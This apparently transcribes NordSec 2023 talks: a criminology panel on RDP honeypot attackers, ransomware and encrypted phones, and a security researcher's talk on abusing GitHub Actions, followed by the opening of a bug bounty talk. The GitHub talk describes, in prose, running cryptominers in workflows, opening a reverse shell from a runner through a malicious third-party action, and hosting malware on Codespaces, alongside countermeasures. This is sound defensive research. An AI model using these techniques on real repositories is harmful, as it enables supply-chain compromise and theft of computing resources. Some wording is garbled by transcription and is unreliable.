tell you, that they've been accepted at Black Hat USA this year, so they'll go and present there this summer. And I know that the research that they'll be presenting is kind of a follow-up of what she's presented here, so maybe if you would wanna talk, tell us a bit what you're gonna present at Black Hat and what's the plan, it'd be nice, of course. So one of the next step of our research was to analyze all the compromise session, so that when the attacker succeed in entering our system, so we will analyze all the video footage, we have over 100 hours to look at, so there's a lot of work before Black Hat. But we already started looking at them and we saw kind of different profiles, and for our Black Hat proposal, we suggest that those profiles should be analyzed under the D&D team, Dungeon and Dragon team, so you have those people, oh, I can't remember the name of the categories now, but there's a sorcerer for sure, no, there's a wizard for sure, there's the bard who doesn't look to know what he's doing, there's, I can't remember the name. There's always a goblin. The what? A goblin. No, there's no goblin there, but you know, there's people entering not knowing what they are doing, it looks like they maybe have buy, they maybe bought the RDP access from someone else, other that they know exactly where they're doing, they already have their tools, they install it very fast, and they do their thing, there's other who compromise other computer to this RDP session, so there's a lot of different behavior that are very interesting, and we will be presenting the video footage with example of the video of what we see and all the analysis of the different profiles that we see. Nice, and you're really actually seeing what attackers are doing in your Honeybuds, so this is rare data that we don't usually have, which probably explains why, and that and your amazing work that you've been accepted at Black Hat Existing. Yeah, it will be interesting. So I have a question for you too as well, when is B-Sides and where? So B-Sides is going to be in September, I want to say 16th of September, it's going to be at the bank, so same venue as last year, we're going to have free workshops and trainings, tons of free food and amazing talks like last year. We did B-Sides the first year and we kind of had to get the talks that we could, and last year we were really just submerged with so many great talks, and so hopefully this year we have the same quality speakers as we had last year, and it's $40 and you even get a free t-shirts, so what more can I say? And it's another chance to gather all together the community and see each other, which is kind of nice, half of the year in Nordseg, the other half at B-Sides Vancouver. But no, truly on your, I'm sorry, sorry, sorry. Sorry. A question on your presentation. Since you've interviewed lawyers, as well as police officers, what group of individuals had the best vision of the problem and the best knowledge, at least a little bit experientially, of the fact that there is a use of phone numbers in the Dominican Republic? I'm going to get a little too punk to trust Avergle-Layman at the police on the fact that they don't need to be in the phones. I'm sure that Melanie will answer this one of everything you've heard about. I'm sure that you'll be able to answer this one of everything you've just seen. So can we trust that our rights are respected? Well, you know, it's for sure in relation to police officers, it's always interesting to say to us, give us the information where, you know, there are things that can't be said too, technical investigation, all that. I would say that you know, the lawyers, they just want to get around in relation to the opinion of the police. So that's what they gave us, more information on that. But as I find interviews, it's fun, because it gives us different points of view, and it's really opposite of the police side and the side of more lawyers and criminals. So that's what's really interesting, I find interviews. But you have to see that there's a huge amount of risk. Even if we can think that when the police will have the phones, they will do what they want, there's still a huge amount of risk of going crazy in the phones, of being caught and realizing that, we have the worst conversations we haven't had. So I like to think that they respect our rights and all that, but there's a little bit of, how can I say, we'll look a little bit in the corner to see if we find something interesting. But in fact, I think I was just asking the question really, are those people you had interviews with, you answered by their idea that that was what was happening, where they really had a concrete experience of using digital phones in cases as such. Yes, absolutely. So it was really people who had their experience, so the files they had, how did they treat those files? So they really counted on the victim. And was it something that was recurring in their experience? Yes, in fact, there's probably no more case where there's no smart phone that's involved, no criminal case, at least. The question becomes more, are we able to use the proof of the phone to condemn someone because the phone is going to be encrypted? But a little bit like today, what crime is not vaguely cyber? I think all crimes are going to be cyber. I don't know if that's because the criminals are talking about Messenger. OK. That's good, thank you. If I ask a question to the whole panel, I might change it in English. That's very Quebec-Maurial, in fact. Just a question for the whole panel. I think there's one thing that comes out of all your presentation, is whether or not attackers are sophisticated, like either through using shadow phones or ransomware or attacking RDP honeypots. Like, are they sophisticated from your perspective? Are we really facing individuals who are, yes, kind of innovating all the time, but being sophisticated and we're having a hard time, or are we mainly facing dumb people trying to just hack for hacking? Just really, it's a really broad question, but I think it's a question that needs to be asked because we live in an industry where we always talk about attackers as the guys with the hoodies or the girls with the hoodies who are highly motivated. And I'm just wondering, from your experience, what is it? So, I don't think, well, it's important to have the same definition of sophistication. This is where the argument is. In my case, in my research, I think of sophistication as anything else than the pure basic easy, well, easy. Again, like, my mother cannot do this attack, right? So, it's not, like, you need some knowledge and how to do it, but you know, there's the plain basic, very opportunistic. I think we can, like, use this term, so opportunistic, and then I considered a bit more sophisticated those who think about what they are doing and try to do better, right? By leveraging information and by trying to imitate behavior. So, this is my definition, but people don't have the same definition. I think that most, I look to answer the question, I think that most are not the highly motivated, very good hacker, most, at least for RDP attacks, are kind of basic opportunistic attackers, and that's all. So, reaching for the low-hanging fruit. Yes, exactly. If I can just revert the question for you just before we go to the other speakers, is how many attacks on your RDP were actually really sophisticated? You could see a human was behind the attack, really trying to get in. It's hard, I can tell for sure. Like, who is the human and who is not? Well, there's a human behind the screen, but I mean, you know. And I, because I don't, I, like, no, I cannot tell. I don't have an answer for you because I can't tell. I guess it would be the ones who actually compromised the systems and then started to do things like watching offensive videos. Yeah, of course they are human, right? Because like they were able to compromise it and I see them, I see their clicks, their keyboard, and it's obviously not a computer doing that. So, of course there's, well, for those people, we have like 3,000 session, like video, different video footage. So there's at least 3,000 human. And then from these 3,000, at your next presentation, you'll be able to let us know how many were at least reaching for the stars. Good answer, yes. Exactly, yes. What about you, other? So I think from my research, like I would say like your top 1% of ransomware creators would be very sophisticated. We can think of like the writers of LockBit for one and like the top dogs, well not dogs, but like top ones would be yes sophisticated. I don't think that the affiliate and going down or as sophisticated because they rely on other people's product. But I also think the question should also be, do they really need to be sophisticated when their target are not? Like if small hits are still working, like if your basic phishing attacks still works, why would you waste your time into something that is gonna cost you more money, is gonna be harder to pull off and take more time? It would be probably smarter if your intention is to get money to hit in the path of lease resistance and sometimes sophistication is not needed for that kind of attack. So that would be my answer. That's a good point. Well, I would say for encrypted phones, once again, if sophisticated, what does that mean? But you know, often the encrypted phones, the people who use it, it's the organized crime or the, you know, the smaller, you know, the bigger, the bigger group, so I would say in what is also maybe more of the encrypted crime and it won't be the smaller criminals who are going to use encrypted phones. So I would say more sophisticated. And maybe one last point is we've seen a change and I think Andrian's work really showed it, is we have this professionalization of the attackers where they're gonna be attacking from eight till four, Monday through Friday, and there's this question of relentlessness also. So it's not someone who's casually poking targets, trying to get in. If you remember the movie hackers, great movie, but they're just poking around, they stumble into something. But right now it's a bit more coordinated. We have state actors that are attacking, companies that are attacking each other as well. So I think this professional aspect in this organization doesn't mean they're more sophisticated, it's just they're more organized, and even if they're not better than they used to be because they're organized, they can achieve more. True, thank you. I'll go with the questions from the public and maybe jump in after that. David in Mélanie, there's a question that says, in relation to the presentation, the force of the order and the system of justice seem to take a position against the protection of private life in order to help them in their work. What do you think? Tough question. It's not necessarily to take a position against, but in fact it's always the point of view. And we have a continuum, we're going to, on the one hand, protect people by arresting criminals, and on the other hand, we're going to protect people by preventing their private life from being made public. And I think it's a choice of society, and a choice of politicians to say, where do we want to put the barrier? And of course, the people who want to succeed in their work, to have promotions, to put the criminals behind bars because it's the thing for them to be born. That's why they breathe. But they're always going to push to finally have the work as simple as possible. So we see a certain movement to have access to this information. But at the same time, I find that the counter-power works really well, until now, in the word Canada, or in the sense that what we see, when we were talking, for example, to the prosecutors, when we actually see what they have the right to look at, is so pointed at the point of being almost useless, in the end. I think we're still good here, especially when we compare a little, as I said, to England, where we're going from the other side completely. Or in the end, we wonder if we still have a private life. Melanie, you're right. I would say quite the same thing, that David said, there's always this debate, and not just in the encrypted phones, in the Sberk that has been in general, between private life and security. So this debate is always there. But I would say that, you know, in Canada, we still have access to the safety of the data, all of that. A chance, at least in my opinion, but in all cases. Maybe I'll just continue with you when we talk about encrypted phones, just to know, have you seen legal use of encrypted phones in your search? Can you give examples, talk about it a little bit, or are we really just in an illicit world? The advertising should really be done for criminals. Are there companies that use this phone? Because precisely, it allows you to have a higher level of confidence, possibly, but it's probably a drop in the ocean. Because finally, these phones are not known to all. There is no advertising on TV to say, buy your BlackBerry PGP. So it's not going to be in those circles. And so I think we can say it's a lot of criminals, finally. And then the example, the supplier, if that's the case, in the end, that after the closure that other suppliers had had, they tried to make their company more legitimate and try to hunt down the clients, like criminals, to prevent them from closing their company. But they didn't really succeed. They rather decided to just close the company before they were stopped. So I would also say that the majority of people who use this phone are the people who do it to hide criminal activities, illegal stuff. Have you thought about questioning these operators to find out if they are available, to find out why they develop these phones, and precisely if they don't necessarily have a different vision of what their service is for them? Yes, exactly. But in a universe where we are financed by the Foundation of the Barrow of Quebec, that's the question. Okay. Vicky. So from somebody in the audience, do you think game theory could be applied to analyze attacks and identify potential false flag operations? I think you can, but then it would also be difficult because it's like what we found with ransomware groups is that they share a lot of similarities in how they behave. So then attributing who does what becomes very difficult and you can't know for a fact, there's also a lot of, I'm gonna make this look like somebody else did it so I can put the blame on it. This is often done for political reason. So when you're playing with that and then trying to compare it to like with false positive, it could all, you could do it, but I don't know if it would be the most efficient way to use game theory. What would be the most efficient way to use game theory? In cybersecurity, I guess. In cybersecurity, okay. I do think that it's a good way to use it when you're studying extortion, when you're looking at a conflict head on, like I don't think phishing as a whole could be, like that would be a good use of game theory. Ransomware is interesting because there's that back and forth in that, I don't want to say collaboration, but you do need to collaborate with the victim to get a payment. There is that interaction that can be studied. So I think in crimes where you need both parties to interact with each other would be a good usage of game theory. Yeah, true. Thank you. Andrian, in your IPs, you had Monaco. Do you know why? Monaco? Yeah, I don't know why. No, I don't, but you know, this is also a part of the next steps is to look at shared IPs or very close IP from one another and we want to investigate where are those IPs and are they from, you know, the words is missing, but the companies that are specialized in, like making the traffic go through them. DNS? What is it? DNS? Maybe, I don't know. I don't know either. DNS? So, like when there's company that you can go to... Do you want to scream it? Yeah, I don't... Do you want to scream it? Yeah, let's say that. Okay. Like a company that only is there to... Forward traffic? Forward traffic, yes. Sorry for that. Team effort. So it's not like from one computer, but from like a seller of proxies. So this will be part... Like this... We might be answering this question by this because if it's a company of proxies... Okay, to determine whether or not the attacks... Are really from Monaco? From a proxies or not, okay, I see. So determining whether the IP... where the attack comes from, whether it's owned by a proxy server... Yes. Makes sense, yeah, yeah. Sorry, difficult to answer, but... Yes. This is alignment. Tell me, somebody asked where were the honeypots located? Did you deploy them all over the world? No, they are all located on an AWS computer site in the United States. So this might change. We want to... Well, it had been... I know that Olivier already tested like putting honeypots a bit everywhere in the world, but he didn't get like so much... conclusion from it, but I would like to do it again and look at the data for myself to compare, like, if the United States were targeted in this case or if there's a difference between the honeypots, but they were all in the same place for this project. Interesting. And it's true, he did try. We did it for... Yeah, you were there. We hosted honeypots all over the world in the research project and we thought that it would be different, but it was not. In the end, it was just the same thing. So I would be wondering whether RDP Honeypots would have different findings. Maybe one last question that I would ask you all is if I gave you the opportunity to do research with the millions of dollars I have and absolutely no... let's say absolutely no headaches in the sense that you can do the research you want and sort of research questions that you can and reach the study population that you want. Whom would you reach? What would you study to answer the research questions that you have answered today? And why? Because what I'm seeing is in criminology and in other research that we do, we're stuck doing secondary data analysis on secondary data from white papers, from, for example, interviewing people who have heard about it or seen it but haven't used it for the purpose that we want to study. So I'm just wondering, if I ever you could do a research to answer your research questions reaching a certain population, what would it be? And I gave you my funding, like my million-fundation dollar. And we have no problems with ethics? No problems with ethics. And that's the hard part, honestly. This never happens. It cares for sure. So to me, it's this whole class of enablers, basically, you know, people who enable others to do crime. I think these are the most interesting people we've barely managed to talk to, interview and try to understand who they are, where they're coming from, what their goals are, are they happy? We don't know. One of my students, she spent months hanging out on different forums that exploit XSS and Alligator and other forums. And she managed to interview 18 Russian hackers, which was really quite interesting, but that was months and months of efforts and trying to understand kind of, you know, so we asked them, you know, what are the three skills that you need to be a good hacker and where did you learn them? And that's the kind of stuff that I really like. It takes forever to earn their trust and to just be there, and that would be something if I could... I wouldn't want millions of dollars. I would want a time machine so I can fast-forward through all that part and get to the juicy stuff at the end. Interesting. Okay, so I have so many ideas. And since ethics is not a problem, I'm going to go with the real one. So what I would really want to do if ethics, and none of that was a problem, I would want to do group interviews in one room, and you put all of, like, all the APTs, like, from Russia, from Iran, from China, from, you know, North Korea, put them all in the room, and then no agent anywhere, obviously. And then I would just ask all the questions about the rules of engagement and the tools for espionage, because I think that would be so interesting to study from inside of how things are happening, because APT groups so far have been one of those things that are really hard to study because you can't get close. So that's what I would do. That would cost a lot. Well, you said millions. And you, on Rehan, what's your dream research? So call me not creative, but I cannot think of any other project that what we are doing right now with, like, kind of looking, like, with the video footage of what they do, of what the hackers do once they compromise a computer. I would just expend this a thousand times and look at the footage for, like, hours. I love video footage. Are you doing your dream research? I think so. Yeah, for my PhD, I looked at the footage of, like, the police interviews and things like that, and I loved it, and, you know, I know how to study that. So I really liked it. It's a bit voyeur to, like, look at... Like, they don't know we're looking at them, and they're, like, compromising computers, and I kind of like it. Nice, interesting. Melanie, do you want to add something? I was going to say a little bit of the same thing that you said, Andrea. At the end of the day, it would be them who would be more difficult to join when we're doing the research. But really, you know, yes, the interviews, yes, you're often going to have bills of reliability, yes, or other bills, but just to see them, as you say, in their environment without knowing a bit about them, it avoids those bills, and I think it would be interesting to study that. Interesting. On my side, I'll share just because I can. I think I'd want to... I think I'd want to chill with hackers, but real ones, like in the sense of in Eastern Europe or in Russia, and see what's their reality and understand how and why they participate in such activity. And with no judgment, and when I say chill with them, it's basically just talk, you gotta explain that you're not looking at them, but you also are interacting with them, so you're having an impact on them. I mean, we could share the project, and then we'd pick a nice destination with a beach somewhere, combine all of them together, we study them, we hang out, and then have a nice vacation, because like, hey, we're not paying. Exactly. Well, thank you so much, everyone, for being here. We have a 15 minutes break, then there's two other presentations coming up, and the closing ceremonies, so please stay. And thanks for listening to us and for being at Nordsec. Thank you all. Thank you for... Oh, there's a... There's a raffle, too. That will be so... Stay tuned and be here at the ceremony. A raffle. Hello, hello, hello. Good. So we continue with the unofficial subsection of the conference. So we have Magno here. Magno Logan works as a information security specialist for Trend Micro. He specializes in cloud, container, and application security research, threat modeling, and DevSecOps. In addition, he has been tapped as a resource speaker for numerous security conferences around the globe. So please welcome Magno. There you go. Thanks, everyone. So, yeah, today we're going to talk about GitHub, just abusing GitHub for fun and profit, actions and code space security. I'll focus more on the actions part. Code Spaces is a research that I did together with my teammate, Nitesh. I'll present a few things at the end, and there's more stuff coming up in the next few conferences as well. We have another talk in NDC in the next week. Stay tuned for that. So, yeah, just a little bit about myself, originally from Brazil, been in Canada for five years now, and I'm part of the Nebula cloud and container research team. I have a blog there called Katana Security. It's currently offline now, but I should probably restart it. I'm also an instructor at GoHacking. It's a cybersecurity company in Brazil. We provide intermediate to advanced trainings in cybersecurity, and we're trying to bring those trainings to Canada and in English as well, so those are live and online trainings. But, yeah, the best way to reach out to me is through the LinkedIn. This is the QR code. If you want to scan it, feel free. I guarantee there's no malware there. So, yeah, on this one, at least, but yeah. So, yeah, these are the topics for today. I'll try to go over them really quickly since the time is short. But, if you want to learn more, this research that I did around GitHub Actions, I took about at least three to four months doing the research and then writing this blog post. There's a lot of content there that I won't be able to cover everything here in this talk. But, yeah, a special thanks to Felipe Proteus, a friend of mine who helped me with this research as well. Okay. So, who here has used GitHub Actions? Okay, a few hands. Who here uses it in production? Last, okay. Who here has played with GitHub? Yeah, okay, that's sort of expecting. That's fine. But, yeah, if you work with CICD tools, things like Jenkins, GitHub Actions has a similar approach, but in a way that you don't need a separate server or separate environment who do some automation, your CICD, continuous integration, continuous deployment. And basically, the idea is that you have a file inside your repo and whenever there is an event, something that happens inside your repo, it can be like a push or a pull request or something changes there. That triggers this event. And this event spins up or actually assigns a VM inside Azure, right? Since GitHub is now owned by Microsoft and these VMs, they're not containers, they're virtual machines, they're called runners. So, each job or automation that you have which are a series of steps or scripts, they spin up their own runners and inside those runners, inside those jobs, you can run scripts, you can run commands and you can also run other actions. So, inside your action, you can call other actions. So, there is some dependency there. And there is three kinds of runners that you can have. You can have, like, Windows, Linux, which is based on Ubuntu or Mac OS. You can do that. And these are provided by GitHub. So, these are any account, any free account today, you can leverage actions. Of course, there is a limit. I believe there are 30 hours per month, but you can use those today. I guess the high adoption rate for GitHub actions, one of the reasons is because it's free. Of course, people like free stuff, but also because of the marketplace. The marketplace is basically anyone can develop their own actions and provide it, make it available on the marketplace so people can use it, avoid reinventing the wheel. And so, companies are developing their own, like, plugins and providing that on the marketplace. And I think this number is already higher today. And so, yeah, it's happily increasing. So, people are making available automation where you don't need to write your own action. Basically, you just need to call other people's other tools and integrate on your pipeline on your repository. Okay, but if anyone can upload actions, what happens if attackers also do that? What if I'm a malicious user and I upload something to GitHub? There is no today, as far as I know, there is no security process being done around GitHub actions. There is no verification. So, if I upload malicious actions there, there is no checks or anything being done in that front. So, what are attackers are doing in that sense. Basically, they're abusing GitHub actions to mine cryptocurrency, right? It's free money. So, if I have 30 hours, this is basically one of the YAML scripts of one of the actions that I've analyzed. There's hundreds of those still today available on GitHub. And basically, what they're doing at the end here, you can see that they're running a node.exe, Axe and Briggs, so usually Monero Crypto Miner and then the username and stuff. So, I'm not big on crypto, but yeah, this is what we're doing. Some of the attackers they're even limiting the CPU percentage to avoid detection. So, some attackers in this command they have like a limited 70% to avoid being detected. This top thing here, the strategy, it's basically to parallel, to scale your actions and maybe deploy different runners at the same time to make more money faster. And this part here is that I'm using third-party actions. So, this uses parameter. It's like I'm calling a third-party action. And this one is actually provided by GitHub, basically to download the code of your repo inside that VM, inside that runner. But this one here is not. It's not provided by GitHub. It's a third-party action by someone else. Someone made an action to retry your action in case it fails. But attackers already are using that. They're leveraging this third-party action, which is a legitimate action to their own gains, to their own profit. So, this is really interesting. And in here, of course, they're abusing like a Windows runner, but I have more examples of Linux and macOS as well. So, yeah, I've analyzed this third-party GitHub action, and it's actually a legitimate one. And attackers are using that for their own gains, which is interesting because it's like they know better than us who are trying to build pipelines and use actions. They're doing it better than us here. And, of course, the node.exe there was a malicious file. It was flagged by VirusToto and things like that. So, yeah, bad thing. Another example here. Now using PowerShell, it's still with Windows runners. And this script is really interesting because I found hundreds of examples of scripts, of repositories with the exact same code. So, basically, at downloading the crypto miner and then extracting the file and running there. So, pretty basic stuff, but they're making free money, right? Whatever. Until the GitHub security team can flag and can monitor that for any suspicious activity, they're making free money. So, these are some of the examples of the repos with the same code. There is probably a hundred more. We reported those to GitHub. I think they took it down pretty much most of these, but if not the attackers were able to just create a new user, create the same repo or a new repo and then start, you know, mining things again. So, it's just like a cat and mouse chase in this scenario because it's like, yeah, it's hard to block and especially when they block the actions, they block that specific repo. So, they don't block the user itself. So, if the user creates another repo, they can still leverage the actions to continue mining. Some other examples here are now using Linux. Same thing. Just downloading, extracting the crypto miner and then running there. XmRig again. So, you can find that even just doing basic search on GitHub, if you look for XmRig where it's inside the .github slash workflows directory, the folder where you're supposed to store your actions, your automations, just search for XmRig and you're probably going to find some examples there. And, yeah, similar way to just mining cryptocurrencies. And the latest example that I have here and it's from abusing macOS. As I said, you can also run a macOS runner, macOS VM inside through the GitHub actions, which runs on Azure. This one, like, okay. This seems like a legitimate thing, I don't know, core book, whatever. It's Chinese, I guess. But, oh, yeah, you can run. There's some instructions there. But, when you go to check the YAML file, that's where it shows exactly what it's happening. You can see that there is XmRig no fee and there was a file there as well. I think, yeah, XmRig no fee down here. So, that's the one, the file that it's using. But, basically, yeah, it's a crypto miner. I'm not a macOS expert, but I asked my help from my team there to analyze the binary and it's definitely a crypto miner as well. So, not a good idea, not a good, not a legitimate file. So, I'm not sure why they're doing this core book hacking task, why they name it like this, but they always try, as you can see in the previous examples, they're always trying to, you know, make it sound legitimate. I don't know why, but, yeah, the name, CICD there, run tests, things like that to try to mask it, but it's not that great, right? Okay. So, if you ever see this on a GitHub action, if you go to the tab there and you see GitHub action is currently disabled for this repository, it's probably means that they did something bad with that repo and that's blocked because okay, now you're not allowed to deploy the VMs, the runners inside Azure to run your automation, right? But as I said, if you create a new repo and then that repo is allowed to deploy actions again, so it's not really effective in a way that, okay, the attackers can just create new repositories and then start mining cryptocurrency again. Just another example here. Okay, so after this introduction, basically my research, the focus of my research was the main focus was on malicious GitHub actions, right? Third party, as I said, you can leverage the marketplace to use GitHub action developed by other people, but what happens if this other people is a malicious user? So what I did was I created a separate action in another repo and I try to call it from my own repo. That was the goal of my research. Of course, I didn't upload to the marketplace, otherwise I would get fired, but yeah. So the idea is you have to treat your GitHub actions as a third party dependency, right? Just like you have to interact with your libraries in your code that you import a lot of libraries and you don't know where they're from. Basically you need to treat your actions like this. A few things here to highlight is there is one validation from GitHub that checks the creator of the GitHub action. So you can see here this blue check mark. It's not like the Twitter check mark. If you pay, you get it. No. That's a domain validation from the company or the user. So most of the companies will try to get this one. But again, this is not a security verification. It doesn't mean that the action was checked for, you know, any malware, backdoors or crypto miners. And the other example there is that every action is a public repository. So when you're calling actions over there with uses, actions slash checkout, you can actually go to that repo and see the code that it's being downloaded and run inside your runner, inside your VMs. So if you go to github.com slash actions slash checkout, you can read that code. And if you have proper tool to static analysis, for example, you can analyze that code and see what it's doing. But these ones from actions, the user or organization actions, these ones are provided by GitHub. So technically, they should be legitimate, unless someone has compromised their user name or something. Okay, so this is what I was able to do during my research. Not just exploiting the third party action, but basically running inside, technically you can't run interactive commands inside your VMs, your runners. I was able to do that and running an end map inside the Azure network, doing a reverse shell from the runner to external server. And you can also leverage your actions, since there are VMs, their servers, to pivot that and attack other targets, either inside Azure or even outside, because they have outside connection as well. So this is just an example from the end map scan. The first one is my actual runner, my VM bear. You see this is an old screenshot, but basically you see some ports that are known. But there is one port there, 8084, with a server called Mono XSP server. This one, it was interesting because it's a very old ASP.NET server that was there. And I couldn't figure out the reason why it was there. I think it was more for health or monitoring purposes for internal from Azure. But what's interesting is that this web server was the only one that was enabled by default. So you also had Apache and Nginx installed, but it wasn't enabled. So on the latest versions of the action VM, the Ubuntu one, this has been removed. So this server, I'm not sure why exactly, but this one has been removed. So you don't see, it's not even like inactive, it's not there anymore. So here is where I did the reverse shell from the runner. So basically, the Ubuntu VM has a lot of tools that come installed. One of these tools is NETCAT. But the NETCAT version on the Ubuntu is capped because you can't use the dash E version. So this was one way, of course, there are other ways that I used to download and download this from scratch to create like a reverse shell to my instance. So you can see, this is the demo script, and this is my EC2 instance on AWS. And basically, I'm just opening the back door and listening there and waiting for my connection from my action. So we can see the information here that the username, runner, which we call the VMs, runners, we can see here as well, this is from Azure, from the VM provided by GitHub for this scenario. So yeah, now I can have interactive commands, right? I don't need to build this YAML file and submit and make a pull request all the time to wait for the changes, wait for a VM to get assigned for my actions. Now I can with this reverse shell, I can basically write the commands anytime, anything that I need. There is a limit here. I believe that every job has six hours limit, so every set of actions, you can only have six hours to interact with that VM, but that should be enough for research purposes. And each runner runs until 72 hours. So you have like three days until your runner gets disconnected. And once the runner is disconnected, it's shut down. You don't have access to that runner anymore. So anything that you're doing inside that VM, you need to either upload or copy or collect those artifacts, otherwise you lose access, you lose everything that it's there. So yeah, since I can do reverse shells from the runners to my server, I can also issue malicious commands to the servers to my runners, such as scanning or attacking other targets even outside of Azure. So this is, of course, this pivot part I didn't actually execute it, but that's a possibility as well. Okay, now what happens if someone uploads a malicious action to the marketplace? So similar to what I did in this previous slide, this code here, I basically created that in a separate repo. And then on the first repo I call this code. So it's similar to, in a way that marketplace works, just calling a public repository from another location, another user. That's what I did. So yeah, hello word, the example from the GitHub actions documentation there. But then it calls this shell script there, which basically is the same one that I showed earlier which does the backdoor for me, the reverse shell. So what happens is if I provided this into the marketplace, anyone that would use of course I wouldn't label it like that, I would try to make it less suspicious and things like that. But anyone that used this action they would create a reverse shell to my C2 server, my connection there, the EC2, whatever I had it that would work as well. So same way okay, now this is the demo file calling this third party action. So this is another repo. It's the GHA test. They're all public repos. If you want to take a look, there is not a lot there but this is what I'm doing, right? They use this calling this third party action fake GHA which runs that code here, which basically in turn gives me the same reverse shell that I showed you earlier but now from a third party. So be careful with actions that you're downloading that you're leveraging from the marketplace because since there is no verification as far as I know then you can, yeah, if you're not validating those these can happen to your environment as well and once they're inside that environment once they have the control of those VMs there are a lot of credentials there's a lot of tokens including the GitHub token which allows you to maybe change read your repo information there or even write depending on the permissions, write information to back to your repository and you know things like CICD or supply chain attack can happen here as well. I know I'm almost out of time so some counter measures here related to GitHub actions it's not great as far as I know there are no tools today to actually check your actions for malicious intentions, malicious purposes I've been working on writing some rules for other static analysis tools to be able to provide that and I'll probably make that public very soon but as far as I know, I don't know maybe on the next talk Logan can say if the GitHub is working on something like that that would be beneficial but yeah, basically make sure that you have the least privileged permissions to your actions you don't allow to give right permissions if you don't have to because otherwise while that runner, while that VM is valid, if someone compromises that token then they can compromise your repo this is something as well that used to happen in the beginning especially because people were able to fork the original repo and then send a pull request back to the original one and that would trigger the action so people were forking GitHub repos back and forth and that would trigger the action that would basically spin up the runner and mine-crypt the currency but not on the malicious username on the legitimate one that also happened so GitHub added this feature or this protection there which is enabled by default to avoid when someone sends a pull request from a forked repo, it doesn't trigger any actions unless you allow, unless you recognize that person, that user as a contributor to your project and of course, not just the GitHub token but any token that you can leverage, first thing basic stuff is you shouldn't hard code your tokens inside the YAML file, this is basic security approach, you shouldn't do that, there is something called secret inside GitHub where you can add all the tokens and then you just call them by the username I'm not sure if I have an example here but basically that way the token is protected even from your own developers, they can't see it anymore after you add them there so protect those secrets as well because they can give you information access to even other tools so just some examples here if you're not using actions just disable, I think that's the basic approach as well, if you're not using a service or a tool just remove it so you can disable all the actions there and this one is the one about the forked repos, if you're not using or if you need approval for someone forking your repo, then okay, require approval for first time contributors to avoid triggering your action and you know, compromise your environment as well. Okay, I'll try to be really fast here. The next slides are more about code spaces and related to the research as I said that my friend did but I'll just present here a few things. The same way that actions, GitHub actions is based on Azure pipelines as far as I know even the same people worked on both projects, code spaces or GitHub code spaces is based on VS code online which basically an idea of having an idea from your browser that you can quickly spin up your projects, you can start coding directly from the browser, you don't need to set up dependencies and libraries sometimes when a developer joins a company takes them at least a few days to get that environment set up so code spaces tries to avoid that issue with creating the virtual environment for you. When you create a code space environment basically you get this long URL which specifies your username, code space and random ID and the port so you can forward that code space to expose a port as well and we described I think a few months ago I think in January where we published an article where okay, if I can leverage that and I think the total amount of space that each code space gives you is 512 gigabytes so I can use code space as my C2 server to deliver malicious files to other people and if I provide that URL oh it's coming from GitHub so it must be legitimate right so just like it's nothing new here but just like what attackers do with Google Drive and things like that it can be a way of exploiting and tricking even developers that are not aware of that so we did that we showed the directory listing we provide that from our code space and we can provide malicious files there so there is open directories and all that stuff and we we published an article I think was in January talking about this basically we saw that in February where we only found out a few weeks ago that attackers are already leveraging that they are already abusing code spaces to deliver malware to deliver malicious files there as well so we saw this tweet two weeks ago I guess and yeah so this probably going to increase this source of attack this leveraging code spaces to deliver malicious information as well so just be aware of that from your environment especially if you are using for developers leveraging code spaces you should be very careful okay that's all I had for today so if I still have time I'm open for questions if not I'll be here for the next talk and that's all thank you any questions do we have time for questions okay no questions okay go ahead it's not a question specifically but it's kind of a feedback on something you mentioned sure so there is a thing I don't know if you're familiar step security harden runner so it is a get up action you can put at the top you put it the very first one in your job and it will basically interstep it will modify the kernel and the VM and basically you can set firewall rules and it will snoop things and it will basically block execution of untrusted so basically it's kind of a way to harden the rest of your execution okay so it's like is it like a container inside the action inside the VM it's effectively a daemon little daemon that runs at the very top like of your job and then everything that runs after is subject to like it can have firewall rules that can basically prevent those things you were mentioning sounds good so yeah I'm working with OPPA Open Policy Agent to basically develop some rules based on rego to analyze let's say I want to analyze this YAML file focused on get up action and let's say is this YAML file running a malicious like linux command or is it running a crypto miner that's what I'm working on and I should have that available very soon so yeah thanks again for sticking around until the end and please stay around for the next talk from Logan and yeah thanks everyone so we're gonna take about 10 minutes of break to the next talk and don't forget there's a raffle after the the end of the day so we have books we have rubber duckies, flippers a bunch of stuff to give away so stay here alright so welcome to the last talk of Nordsec 2023 still have a little bit of music so you just heard about how to pound get up and now we're gonna talk about how to make money out of doing that so we have with us here Logan McLaren he's been a security enthusiast since getting online in the 90s and finally focuses on helping grow get up bug bounty program during his free time Davils in powerlifting, CTFs and retro gaming so please give it up for Logan well good afternoon everyone I'm glad I have a captive audience here with a raffle coming after this as well so thanks for hanging out goal here today is just chat a little bit about github's bounty program being one of the bigger ones out there but more so focusing on lessons for so years of running the program ways we've learned not to do things ways we have learned to do things and really the key stuff we'll come at the end is the picture slides as it were for takeaways for folks who are either looking to submit stuff to bounty programs ours or otherwise or anyone who's looking to set up a bounty program or work on one as an engineer so hopefully my slides cooperate we had some technical difficulties here we are so I'm a senior product security engineer at github I've been there since about 2019 long time ago I used to run a whole bunch of like hacker zines and stuff that nobody's ever heard of but that was always good fun I am a kilt enthusiast as you can probably guess from this I am actually Scottish I haven't just appropriated kilt but professionally worn many hats everything from support to professional services engineering so never stay in one place for too too long but github's kept me hooked for a little bit so before we dive into things just to get a feel for the audience here who here has submitted bugs to a bounty program before is at least familiar with it raise your hand Magna perfect and perhaps a more niche audience here who here works on a bounty program okay more than I was expecting which is pretty cool so good it's going to be well well rounded so talking about the github program just to set the stage for all of this we started back in 2014 we've been working with hacker one since 2016 so a lot of these numbers are looking at 2016 onwards because that's when we have metrics for but during that time we paid out a little over 4 million US for bounties across about 1350 reports as of this morning so reasonably large payouts compared to a lot of other ones and the overall range for that is bottom end $617 up to 30,000 plus plus plus depending on severity so if you can find something that's pretty narrowly you can walk away with a pretty good payday there but obviously a lot of that's changed over time I like to say it's aged like a fine wine hasn't gotten corked yet so things are pretty good we started out originally being sort of a side gig for our appsec team and it's changed pretty significantly since then so we're now a team of four full-time engineers that are just doing bug bounty stuff to deal with various projects we have on it but also looking at our overall life cycle for vulnerability work as our scope has changed a lot our payouts have changed a lot we originally started out doing 1,000 to 5,000 as I just mentioned it's about six times that much right now and the big part of that as I said is the change in scope so thinking back a couple of years GitHub was primarily source code management and not a lot else now we have actions and code spaces and everything else that we just heard about and many other bits and pieces so a lot more surface area to look at we've also been looking at other ways to expand bug bounty out and this is sort of going into the takeaways a little early but looking at ways to bring this into our release cycles and look at other opportunities to collaborate both internally and externally for this kind of stuff so the process we have is about what you would expect from a bounty process or really a lot of bug triage work first off we'll review 